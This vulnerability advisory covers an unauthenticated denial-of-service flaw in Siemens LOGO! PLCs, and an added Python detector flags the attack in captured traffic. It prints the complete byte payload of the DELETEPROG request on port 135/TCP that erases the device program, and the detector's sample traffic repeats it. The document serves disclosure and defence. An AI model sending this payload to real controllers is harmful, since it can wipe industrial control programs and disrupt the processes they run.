An exploitable denial of service vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can erase stored information, resulting in a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.
Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA
9.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H
CWE-306 - Missing Authentication for Critical Function
Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be controlled remotely.
The LOGO system program can be completely erased through the TDE service port 135/TCP using the "DELETEPROG" function. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/TCP. No user interaction is required to exploit this security vulnerability. The vulnerability impacts the integrity of the device. The payload used was the following:
Structure of payload message sent:
\x4B\xc0\x01\xe0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag
\x00\x00\x00\x00 # Context
\x00\x00\x00\x00 # Session
\x44\x45\x4c\x45 # DELETEPROG command
\x54\x45\x50\x52
\x4f\x47\x00\x00
\x00\x10\x27\x00 # Timeout
\x00
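The following is an added detection example, not code from the advisory or from Siemens: it decodes the TDE message layout shown above from captured packets and flags DELETEPROG requests sent to 135/TCP. The byte offsets follow the structure above; the little-endian reading of Context and Session, the sample traffic, and the benign command name are assumptions constructed for illustration.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

TDE_PORT = 135            # TDE service port named in the advisory
TDE_SIGNATURE = 0x4B      # first byte of the advisory's payload
DANGEROUS_COMMANDS = {"DELETEPROG"}


@dataclass
class TdeRequest:
    flags: int      # 4th header byte (advisory lists Sync/Return/Request flags here)
    context: int    # 4-byte Context field (assumed little-endian)
    session: int    # 4-byte Session field (assumed little-endian)
    command: str    # NUL-terminated ASCII command name starting at offset 12


def parse_tde(payload: bytes) -> Optional[TdeRequest]:
    """Return the decoded request, or None if the bytes are not a TDE message."""
    if len(payload) < 24 or payload[0] != TDE_SIGNATURE:
        return None
    context, session = struct.unpack_from("<II", payload, 4)
    name = payload[12:24].split(b"\x00", 1)[0]
    try:
        command = name.decode("ascii")
    except UnicodeDecodeError:
        return None
    return TdeRequest(payload[3], context, session, command)


def find_deleteprog_requests(packets: List[Tuple[str, int, bytes]]) -> List[str]:
    """packets: (src_ip, dst_port, payload) records; returns one alert per hit."""
    alerts = []
    for src, dport, payload in packets:
        if dport != TDE_PORT:
            continue
        req = parse_tde(payload)
        if req is not None and req.command in DANGEROUS_COMMANDS:
            alerts.append(f"{src}: TDE {req.command} to port {dport} "
                          f"(context={req.context}, session={req.session})")
    return alerts


# Constructed sample traffic: the advisory's payload, a benign message with a
# made-up command name, and the same bytes sent to a non-TDE port.
DELETEPROG_PAYLOAD = (b"\x4b\xc0\x01\xe0" + b"\x00" * 8
                      + b"DELETEPROG\x00\x00" + b"\x00\x10\x27\x00\x00")
BENIGN_PAYLOAD = b"\x4b\xc0\x01\xe0" + b"\x00" * 8 + b"GETSTATUS\x00\x00\x00" + b"\x00" * 5
SAMPLE_PACKETS = [("192.0.2.10", 135, DELETEPROG_PAYLOAD),
                  ("192.0.2.11", 135, BENIGN_PAYLOAD),
                  ("192.0.2.12", 80, DELETEPROG_PAYLOAD)]

if __name__ == "__main__":
    for alert in find_deleteprog_requests(SAMPLE_PACKETS):
        print(alert)
```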
We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019).
2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release
Discovered by Alexander Perez-Palma of Cisco Talos and Emanuel Almeida of Cisco Systems, Inc.